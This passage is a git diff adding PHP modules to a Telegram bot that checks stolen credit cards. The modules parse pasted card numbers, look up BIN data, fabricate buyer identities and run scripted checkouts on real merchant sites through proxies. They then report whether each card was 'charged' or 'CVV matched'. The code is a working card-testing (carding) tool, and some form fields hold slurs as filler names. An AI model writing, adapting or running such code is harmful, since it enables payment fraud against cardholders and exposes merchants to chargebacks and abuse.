+'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
+'content-type: application/x-www-form-urlencoded',
+'Origin: https://everythingsummercamp.com',
+'referer: https://everythingsummercamp.com/',
+'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36',];
+curl_setopt($ch, CURLOPT_POSTFIELDS, '_method=patch&authenticity_token='.urlencode($authenticity_token).'&previous_step=contact_information&step=shipping_method&checkout%5Bemail%5D='.$name.''.rand(1,99).'@gmail.com&checkout%5Bbuyer_accepts_marketing%5D=0&checkout%5Bshipping_address%5D%5Bfirst_name%5D=&checkout%5Bshipping_address%5D%5Blast_name%5D=&checkout%5Bshipping_address%5D%5Baddress1%5D=&checkout%5Bshipping_address%5D%5Baddress2%5D=&checkout%5Bshipping_address%5D%5Bcity%5D=&checkout%5Bshipping_address%5D%5Bcountry%5D=&checkout%5Bshipping_address%5D%5Bprovince%5D=&checkout%5Bshipping_address%5D%5Bzip%5D=&checkout%5Bshipping_address%5D%5Bphone%5D=&checkout%5Battributes%5D%5BCamp+Attending%5D=&checkout%5Bshipping_address%5D%5Bfirst_name%5D='.$first.'&checkout%5Bshipping_address%5D%5Blast_name%5D='.$last.'&checkout%5Bshipping_address%5D%5Baddress1%5D='.$street.'&checkout%5Bshipping_address%5D%5Baddress2%5D=&checkout%5Bshipping_address%5D%5Bcity%5D=New+York&checkout%5Bshipping_address%5D%5Bcountry%5D=United+States&checkout%5Bshipping_address%5D%5Bprovince%5D=NY&checkout%5Bshipping_address%5D%5Bzip%5D=10010&checkout%5Bshipping_address%5D%5Bphone%5D=%28512%29+333-9591&checkout%5Bclient_details%5D%5Bbrowser_width%5D=788&checkout%5Bclient_details%5D%5Bbrowser_height%5D=937&checkout%5Bclient_details%5D%5Bjavascript_enabled%5D=1&checkout%5Bclient_details%5D%5Bcolor_depth%5D=24&checkout%5Bclient_details%5D%5Bjava_enabled%5D=false&checkout%5Bclient_details%5D%5Bbrowser_tz%5D=-330');
+curl_setopt($ch, CURLOPT_HTTPHEADER, $Headers);
+curl_setopt($ch, CURLOPT_HEADER, 1);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, $dexy);
+curl_setopt($ch, CURLOPT_COOKIEJAR, $dexy);
+$curl8 = curl_exec($ch);
+
+#------[CURL-9]------#
+
+$ch = curl_init('https://everythingsummercamp.com/'.$id_1.'/checkouts/'.$id_2.'?previous_step=contact_information&step=shipping_method');
+curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
+$Headers = ['authority: everythingsummercamp.com',
+'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
+'referer: https://everythingsummercamp.com/',
+'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36',];
+curl_setopt($ch, CURLOPT_HTTPHEADER, $Headers);
+curl_setopt($ch, CURLOPT_HEADER, 1);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, $dexy);
+curl_setopt($ch, CURLOPT_COOKIEJAR, $dexy);
+$curl9 = curl_exec($ch);
+$authenticity = trim(strip_tags(getStr($curl9,'
','
'))); +$info = curl_getinfo($ch); +$time = $info['total_time']; +$time = substr_replace($time, '',4); + + +######################END OF CHECKER PART################################################################################ + + + if(substr_count($curl16, 'Thank You for your order')) { + addTotal(); + addUserTotal($userId); + addCVV(); + addUserCVV($userId); + addCCN(); + addUserCCN($userId); + bot('editMessageText',[ + 'chat_id'=>$chat_id, + 'message_id'=>$messageidtoedit, + 'text'=>"Card:$lista
+Status -» CVV Matched [Payment Success] ✅
+Response -» Approved ( Charged 10$ )
+Gateway -» Shopify
+Time -» $times
+
+------- Bin Info -------
+Bank -» $bank
+Brand -» $schemename
+Type -» $typename
+Currency -» $currency
+Country -» $cname ($emoji - 💲$currency)
+Issuers Contact -» $phone
+----------------------------
+
+Checked By $firstname
+Bot By: [ ARC Σ US ]",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ elseif(substr_count($curl16, 'Security code was not matched by the processor')) {
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» CCN Matched [CVV2 Failure] ✅
+ Response -» Approved (Security code was not matched by the processor)
+ Gateway -» Shopify
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: Mabidax",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ else{
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» Dead ❌
+ Response -» $ERROR
+ Gateway -» Shopify
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: Mabidax",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ }else{
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Cool! Fucking provide a CC to Check!!",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);
+ }
+ }
+}
+
+
+?>
\ No newline at end of file
diff --git a/modules/checker/shp.php b/modules/checker/shp.php
new file mode 100644
index 0000000..742a876
--- /dev/null
+++ b/modules/checker/shp.php
@@ -0,0 +1,587 @@
+$chat_id,
+ 'text'=>"[ANTI SPAM] Try again after $antispams.",
+ 'parse_mode'=>'html',
+ 'reply_to_message_id'=> $message_id
+ ]);
+ return;
+
+ }else{
+ $messageidtoedit1 = bot('sendmessage',[
+ 'chat_id'=>$chat_id,
+ 'text'=>"Wait for Result...",
+ 'parse_mode'=>'html',
+ 'reply_to_message_id'=> $message_id
+
+ ]);
+
+ $messageidtoedit = capture(json_encode($messageidtoedit1), '"message_id":', ',');
+ $lista = substr($message, 4);
+ $bin = substr($cc, 0, 6);
+
+ if(preg_match_all("/(\d{16})[\/\s:|]*?(\d\d)[\/\s|]*?(\d{2,4})[\/\s|-]*?(\d{3})/", $lista, $matches)) {
+ $creditcard = $matches[0][0];
+ $cc = multiexplode(array(":", "|", "/", " "), $creditcard)[0];
+ $mes = multiexplode(array(":", "|", "/", " "), $creditcard)[1];
+ $ano = multiexplode(array(":", "|", "/", " "), $creditcard)[2];
+ $cvv = multiexplode(array(":", "|", "/", " "), $creditcard)[3];
+ $c1 = substr($cc, 0, 4);
+ $c2 = substr($cc, 4, 4);
+ $c3 = substr($cc, 8, 4);
+ $c4 = substr($cc, -4);
+
+
+##########################################################CHECKER PART#######################################################
+
+ /////////////////////////////////////////////////////////////////////////////////////
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, 'https://lookup.binlist.net/'.$cc.'');
+ curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+ curl_setopt($ch, CURLOPT_HTTPHEADER, array(
+ 'Host: lookup.binlist.net',
+ 'Cookie: _ga=GA1.2.549903363.1545240628; _gid=GA1.2.82939664.1545240628',
+ 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'));
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_POSTFIELDS, '');
+ $fim = curl_exec($ch);
+ $bank = capture($fim, '"bank":{"name":"', '"');
+ $cname = capture($fim, '"name":"', '"');
+ $brand = capture($fim, '"brand":"', '"');
+ $country = capture($fim, '"country":{"name":"', '"');
+ $phone = capture($fim, '"phone":"', '"');
+ $scheme = capture($fim, '"scheme":"', '"');
+ $type = capture($fim, '"type":"', '"');
+ $emoji = capture($fim, '"emoji":"', '"');
+ $currency = capture($fim, '"currency":"', '"');
+ $binlenth = strlen($bin);
+ $schemename = ucfirst("$scheme");
+ $typename = ucfirst("$type");
+
+
+ /////////////////////==========[Unavailable if empty]==========////////////////
+
+
+ if (empty($schemename)) {
+ $schemename = "Unavailable";
+ }
+ if (empty($typename)) {
+ $typename = "Unavailable";
+ }
+ if (empty($brand)) {
+ $brand = "Unavailable";
+ }
+ if (empty($bank)) {
+ $bank = "Unavailable";
+ }
+ if (empty($cname)) {
+ $cname = "Unavailable";
+ }
+ if (empty($phone)) {
+ $phone = "Unavailable";
+ }
+ ///////////////////////////////////////////////////////////////////////////////////////////////////////
+ @unlink('cookie.txt');
+ error_reporting(0);
+ date_default_timezone_get('America/Buenos_Aires');
+
+ function GetStr($string, $start, $end){
+ $str = explode($start, $string);
+ $str = explode($end, $str[1]);
+ return $str[0];
+ }
+ function multiexplode($seperator, $string){
+ $one = str_replace($seperator, $seperator[0], $string);
+ $two = explode($seperator[0], $one);
+ return $two;
+ }
+
+ function Capture($str, $starting_word, $ending_word){
+ $subtring_start = strpos($str, $starting_word);
+ $subtring_start += strlen($starting_word);
+ $size = strpos($str, $ending_word, $subtring_start) - $subtring_start;
+ return substr($str, $subtring_start, $size);
+ };
+
+
+ if (number_format($mes) < 10){$mes = str_replace("0", "", $mes);};
+
+ if (!file_exists(getcwd().'/Cookies')) mkdir(getcwd().'/Cookies', 0777, true);
+ $dexy = getcwd().'/Cookies/shin'.uniqid('obu', true).'.txt';
+
+
+
+ #------[Winscribe]------#
+
+ $proxy = [
+ 'socks-us.windscribe.com:1080',
+ 'socks-nl.windscribe.com:1080',
+ ];
+
+ if (isset($proxy)){
+ $ip = "Proxy Live ✅";
+ }
+ if (empty($proxy)){
+ $ip = "Proxy Dead ❌";
+ }
+ //echo '['.$ip.'] ','
'))); + $info = curl_getinfo($ch); + $time = $info['total_time']; + $time = substr_replace($time, '',4); + +######################END OF CHECKER PART################################################################################ + + + if(substr_count($curl16, 'Thank You for your order')) { + addTotal(); + addUserTotal($userId); + addCVV(); + addUserCVV($userId); + addCCN(); + addUserCCN($userId); + bot('editMessageText',[ + 'chat_id'=>$chat_id, + 'message_id'=>$messageidtoedit, + 'text'=>"Card:$lista
+Status -» CVV Matched [Payment Success] ✅
+Response -» Approved ( Charged 8.50$ )
+Gateway -» Shopify
+IP -» Proxy [$ip]
+Time -» $times
+
+------- Bin Info -------
+Bank -» $bank
+Brand -» $schemename
+Type -» $typename
+Currency -» $currency
+Country -» $cname ($emoji - 💲$currency)
+Issuers Contact -» $phone
+----------------------------
+
+Checked By $firstname
+Bot By: [ ARC Σ US ]",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ elseif(substr_count($curl16, 'Security code was not matched by the processor')) {
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» CCN Matched [CVV2 Failure] ✅
+ Response -» Approved (Security code was not matched by the processor)
+ Gateway -» Shopify
+ IP -» Proxy [$ip]
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: Mabidax",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ else{
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» Dead ❌
+ Response -» $ERROR
+ Gateway -» Shopify
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: Mabidax",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ }else{
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Cool! Fucking provide a CC to Check!!",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);
+ }
+ }
+}
+
+
+?>
\ No newline at end of file
diff --git a/modules/checker/sm.php b/modules/checker/sm.php
index bf7bb81..5d1f7c7 100644
--- a/modules/checker/sm.php
+++ b/modules/checker/sm.php
@@ -17,7 +17,7 @@
////////////====[MUTE]====////////////
-if(strpos($message, "/sm ") === 0 || strpos($message, "!sm ") === 0){
+if(strpos($message, "/chk ") === 0 || strpos($message, ".chk ") === 0){
$antispam = antispamCheck($userId);
addUser($userId);
@@ -141,7 +141,7 @@
----------------------------
Checked By $firstname
-Bot By: ɴɪɴᴊᴀ ɴᴀᴠᴇᴇɴ",
+Bot By: [ ARC Σ US ]",
'parse_mode'=>'html',
'disable_web_page_preview'=>'true'
@@ -212,7 +212,7 @@
----------------------------
Checked By $firstname
-Bot By: ɴɪɴᴊᴀ ɴᴀᴠᴇᴇɴ",
+Bot By: Mabidax",
'parse_mode'=>'html',
'disable_web_page_preview'=>'true'
@@ -241,7 +241,7 @@
----------------------------
Checked By $firstname
-Bot By: ɴɪɴᴊᴀ ɴᴀᴠᴇᴇɴ",
+Bot By: Mabidax",
'parse_mode'=>'html',
'disable_web_page_preview'=>'true'
diff --git a/modules/checker/ss.php b/modules/checker/ss.php
index 31e3767..d2d3e43 100644
--- a/modules/checker/ss.php
+++ b/modules/checker/ss.php
@@ -17,7 +17,7 @@
////////////====[MUTE]====////////////
-if(strpos($message, "/ss ") === 0 || strpos($message, "!ss ") === 0){
+if(strpos($message, "/ss ") === 0 || strpos($message, ".ss ") === 0){
$antispam = antispamCheck($userId);
addUser($userId);
@@ -219,7 +219,7 @@
----------------------------
Checked By $firstname
-Bot By: ɴɪɴᴊᴀ ɴᴀᴠᴇᴇɴ",
+Bot By: [ ARC Σ US ]",
'parse_mode'=>'html',
'disable_web_page_preview'=>'true'
@@ -246,7 +246,7 @@
----------------------------
Checked By $firstname
-Bot By: ɴɪɴᴊᴀ ɴᴀᴠᴇᴇɴ",
+Bot By: Mabidax",
'parse_mode'=>'html',
'disable_web_page_preview'=>'true'
@@ -273,7 +273,7 @@
----------------------------
Checked By $firstname
-Bot By: ɴɪɴᴊᴀ ɴᴀᴠᴇᴇɴ",
+Bot By: Mabidax",
'parse_mode'=>'html',
'disable_web_page_preview'=>'true'
diff --git a/modules/checker/st.php b/modules/checker/st.php
new file mode 100644
index 0000000..4da1d6d
--- /dev/null
+++ b/modules/checker/st.php
@@ -0,0 +1,583 @@
+$chat_id,
+ 'text'=>"[ANTI SPAM] Try again after $antispams.",
+ 'parse_mode'=>'html',
+ 'reply_to_message_id'=> $message_id
+ ]);
+ return;
+
+ }else{
+ $messageidtoedit1 = bot('sendmessage',[
+ 'chat_id'=>$chat_id,
+ 'text'=>"Wait for Result...",
+ 'parse_mode'=>'html',
+ 'reply_to_message_id'=> $message_id
+
+ ]);
+
+ $messageidtoedit = capture(json_encode($messageidtoedit1), '"message_id":', ',');
+ $lista = substr($message, 4);
+ $bin = substr($cc, 0, 6);
+
+ if(preg_match_all("/(\d{16})[\/\s:|]*?(\d\d)[\/\s|]*?(\d{2,4})[\/\s|-]*?(\d{3})/", $lista, $matches)) {
+ $creditcard = $matches[0][0];
+ $cc = multiexplode(array(":", "|", "/", " "), $creditcard)[0];
+ $mes = multiexplode(array(":", "|", "/", " "), $creditcard)[1];
+ $ano = multiexplode(array(":", "|", "/", " "), $creditcard)[2];
+ $cvv = multiexplode(array(":", "|", "/", " "), $creditcard)[3];
+
+
+##########################################################CHECKER PART#######################################################
+
+ /////////////////////////////////////////////////////////////////////////////////////
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, 'https://lookup.binlist.net/'.$cc.'');
+ curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+ curl_setopt($ch, CURLOPT_HTTPHEADER, array(
+ 'Host: lookup.binlist.net',
+ 'Cookie: _ga=GA1.2.549903363.1545240628; _gid=GA1.2.82939664.1545240628',
+ 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'));
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_POSTFIELDS, '');
+ $fim = curl_exec($ch);
+ $bank = capture($fim, '"bank":{"name":"', '"');
+ $cname = capture($fim, '"name":"', '"');
+ $brand = capture($fim, '"brand":"', '"');
+ $country = capture($fim, '"country":{"name":"', '"');
+ $phone = capture($fim, '"phone":"', '"');
+ $scheme = capture($fim, '"scheme":"', '"');
+ $type = capture($fim, '"type":"', '"');
+ $emoji = capture($fim, '"emoji":"', '"');
+ $currency = capture($fim, '"currency":"', '"');
+ $binlenth = strlen($bin);
+ $schemename = ucfirst("$scheme");
+ $typename = ucfirst("$type");
+
+
+ /////////////////////==========[Unavailable if empty]==========////////////////
+
+
+ if (empty($schemename)) {
+ $schemename = "Unavailable";
+ }
+ if (empty($typename)) {
+ $typename = "Unavailable";
+ }
+ if (empty($brand)) {
+ $brand = "Unavailable";
+ }
+ if (empty($bank)) {
+ $bank = "Unavailable";
+ }
+ if (empty($cname)) {
+ $cname = "Unavailable";
+ }
+ if (empty($phone)) {
+ $phone = "Unavailable";
+ }
+ ///////////////////////////////////////////////////////////////////////////////////////////////////////
+ if(file_exists(getcwd().('/cookie.txt'))){
+ @unlink('cookie.txt');
+ }
+ #------[Email Generator]------#
+
+ function emailGenerate($length = 10)
+ {
+ $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
+ $charactersLength = strlen($characters);
+ $randomString = '';
+ for ($i = 0; $i < $length; $i++) {
+ $randomString .= $characters[rand(0, $charactersLength - 1)];
+ }
+ return $randomString . '@gmail.com';
+ }
+ $email = emailGenerate();
+
+ #------[CC Type Randomizer]------#
+
+ $cardNames = array(
+ "3" => "American Express",
+ "4" => "Visa",
+ "5" => "MasterCard",
+ "6" => "Discover"
+ );
+ $card_type = $cardNames[substr($cc, 0, 1)];
+
+ #------[Rand]------#
+
+ $DET = file_get_contents("https://namegenerator.in/assets/refresh.php?location=united-states");
+ $data = json_decode($DET, true);
+ $fname = explode(" ", $data['name'])[0];
+ $lname = explode(" ", $data['name'])[1];
+
+ $first = ucfirst(str_shuffle('ARC Σ US'));
+ $last = ucfirst(str_shuffle('Noob'));
+ $street = trim(strip_tags(getStr($DET,'"street":"','"')));
+ $city = trim(strip_tags(getStr($DET,'"city":"','"')));
+ $state = trim(strip_tags(getStr($DET,'"state":"','"')));
+ $Zip = trim(strip_tags(getStr($DET,'"postcode":',',"')));
+ $seed = trim(strip_tags(getStr($DET,'"seed":"','"')));
+ $ph = array("682","346","246");
+ $ph1 = array_rand($ph);
+ $phh = $ph[$ph1];
+ $phone = "$phh".rand(0000000,9999999)."";
+ $numero1 = substr($phone, 1,3);
+ $numero2 = substr($phone, 6,3);
+ $numero3 = substr($phone, 6,4);
+
+ /*
+ Product Page => https://www.browserstack.com/pricing
+ */
+
+ #------[GET]------#
+
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, 'https://theibsguide.com/');
+ curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+ curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
+ $headers = array();
+ $headers[] = 'authority: theibsguide.com';
+ $headers[] = 'method: GET';
+ $headers[] = 'path: /';
+ $headers[] = 'scheme: https';
+ $headers[] = 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
+ $headers[] = 'accept-language: en-US,en;q=0.9';
+ $headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+ $headers[] = 'sec-ch-ua-mobile: ?0';
+ $headers[] = 'sec-ch-ua-platform: "Windows"';
+ $headers[] = 'sec-fetch-dest: document';
+ $headers[] = 'sec-fetch-mode: navigate';
+ $headers[] = 'sec-fetch-site: none';
+ $headers[] = 'sec-fetch-user: ?1';
+ $headers[] = 'upgrade-insecure-requests: 1';
+ $headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+ curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+ curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+ $get = curl_exec($ch);
+
+
+
+ #------[CURL-1]------#
+
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, 'https://theibsguide.com/register/happy-gut-guide');
+ curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+ curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
+ $headers = array();
+ $headers[] = 'authority: theibsguide.com';
+ $headers[] = 'method: GET';
+ $headers[] = 'path: /register/happy-gut-guide';
+ $headers[] = 'scheme: https';
+ $headers[] = 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
+ $headers[] = 'accept-language: en-US,en;q=0.9';
+ $headers[] = 'referer: https://theibsguide.com/';
+ $headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+ $headers[] = 'sec-ch-ua-mobile: ?0';
+ $headers[] = 'sec-ch-ua-platform: "Windows"';
+ $headers[] = 'sec-fetch-dest: document';
+ $headers[] = 'sec-fetch-mode: navigate';
+ $headers[] = 'sec-fetch-site: same-origin';
+ $headers[] = 'sec-fetch-user: ?1';
+ $headers[] = 'upgrade-insecure-requests: 1';
+ $headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+ curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+ curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+ $curl1 = curl_exec($ch);
+
+
+
+ #------[CURL-2]------#
+
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, 'https://theibsguide.com/register/happy-gut-guide');
+ curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+ curl_setopt($ch, CURLOPT_POST, 1);
+ $headers = array();
+ $headers[] = 'authority: theibsguide.com';
+ $headers[] = 'method: POST';
+ $headers[] = 'path: /register/happy-gut-guide';
+ $headers[] = 'scheme: https';
+ $headers[] = 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
+ $headers[] = 'accept-language: en-US,en;q=0.9';
+ $headers[] = 'cache-control: max-age=0';
+ $headers[] = 'content-type: multipart/form-data; boundary=----WebKitFormBoundaryYqtdeZoEv8CUfZBl';
+ $headers[] = 'origin: https://theibsguide.com';
+ $headers[] = 'referer: https://theibsguide.com/register/happy-gut-guide';
+ $headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+ $headers[] = 'sec-ch-ua-mobile: ?0';
+ $headers[] = 'sec-ch-ua-platform: "Windows"';
+ $headers[] = 'sec-fetch-dest: document';
+ $headers[] = 'sec-fetch-mode: navigate';
+ $headers[] = 'sec-fetch-site: same-origin';
+ $headers[] = 'sec-fetch-user: ?1';
+ $headers[] = 'upgrade-insecure-requests: 1';
+ $headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+ curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+ curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+ curl_setopt($ch, CURLOPT_POSTFIELDS, '------WebKitFormBoundaryg52Ru9VaEF1i4TuK
+ Content-Disposition: form-data; name="mepr_process_signup_form"
+
+ Y
+ ------WebKitFormBoundaryg52Ru9VaEF1i4TuK
+ Content-Disposition: form-data; name="mepr_product_id"
+
+ 22
+ ------WebKitFormBoundaryg52Ru9VaEF1i4TuK
+ Content-Disposition: form-data; name="user_first_name"
+
+ Madarchod
+ ------WebKitFormBoundaryg52Ru9VaEF1i4TuK
+ Content-Disposition: form-data; name="user_last_name"
+
+ Randi
+ ------WebKitFormBoundaryg52Ru9VaEF1i4TuK
+ Content-Disposition: form-data; name="mepr-geo-country"
+
+
+ ------WebKitFormBoundaryg52Ru9VaEF1i4TuK
+ Content-Disposition: form-data; name="user_email"
+
+ '.$email.'
+ ------WebKitFormBoundaryg52Ru9VaEF1i4TuK
+ Content-Disposition: form-data; name="mepr_user_password"
+
+ Moon12#
+ ------WebKitFormBoundaryg52Ru9VaEF1i4TuK
+ Content-Disposition: form-data; name="mepr_user_password_confirm"
+
+ Moon12#
+ ------WebKitFormBoundaryg52Ru9VaEF1i4TuK
+ Content-Disposition: form-data; name="mepr_coupon_code"
+
+
+ ------WebKitFormBoundaryg52Ru9VaEF1i4TuK
+ Content-Disposition: form-data; name="mepr_payment_method"
+
+ pk2x1e-3fx
+ ------WebKitFormBoundaryg52Ru9VaEF1i4TuK
+ Content-Disposition: form-data; name="mepr_agree_to_tos"
+
+ on
+ ------WebKitFormBoundaryg52Ru9VaEF1i4TuK
+ Content-Disposition: form-data; name="mepr_no_val"
+
+
+ ------WebKitFormBoundaryg52Ru9VaEF1i4TuK--');
+ $curl2 = curl_exec($ch);
+ //curl_close($ch);
+
+ #------[CURL-3]------#
+
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, 'https://theibsguide.com/register/happy-gut-guide?action=checkout&txn=20q');
+ curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+ curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
+ $headers = array();
+ $headers[] = 'authority: theibsguide.com';
+ $headers[] = 'method: GET';
+ $headers[] = 'path: /register/happy-gut-guide?action=checkout&txn=20q';
+ $headers[] = 'scheme: https';
+ $headers[] = 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
+ $headers[] = 'accept-language: en-US,en;q=0.9';
+ $headers[] = 'cache-control: max-age=0';
+ $headers[] = 'referer: https://theibsguide.com/register/happy-gut-guide';
+ $headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+ $headers[] = 'sec-ch-ua-mobile: ?0';
+ $headers[] = 'sec-ch-ua-platform: "Windows"';
+ $headers[] = 'sec-fetch-dest: document';
+ $headers[] = 'sec-fetch-mode: navigate';
+ $headers[] = 'sec-fetch-site: same-origin';
+ $headers[] = 'sec-fetch-user: ?1';
+ $headers[] = 'upgrade-insecure-requests: 1';
+ $headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+ curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
